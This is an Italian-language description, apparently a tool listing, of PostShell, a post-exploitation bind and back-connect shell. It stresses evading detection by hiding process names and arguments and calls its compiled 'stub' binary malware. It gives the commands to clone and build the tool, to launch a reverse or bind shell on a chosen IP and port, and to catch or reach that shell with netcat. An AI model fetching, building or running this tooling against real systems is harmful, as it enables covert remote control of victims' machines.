
PostShell - Shell di bind/backconnect per post-sfruttamento
PostShell è una shell post-sfruttamento che include sia una shell bind che una shell back connect. Crea un TTY completamente interattivo che permette il controllo dei job. La dimensione dello stub è di circa 14kb e può essere compilato su qualsiasi sistema Unix-like.
Banner e interazione con la shell dopo l'avvio di una connessione.
PostShell facilita il post-sfruttamento rendendo l'attaccante meno dipendente da dipendenze come Python e Perl. Incorpora inoltre sia una shell back connect che una shell bind, il che significa che se un target non consente connessioni in uscita, un operatore può semplicemente avviare una shell bind e connettersi alla macchina in remoto. PostShell è anche significativamente meno sospetto di una shell tradizionale perché sia il nome dei processi che gli argomenti sono nascosti.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Questo dovrebbe creare un binario chiamato "stub" che è il malware.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Ricevere una backconnect:
$ nc -vlp port
Connettersi a una shell bind:
$ nc host port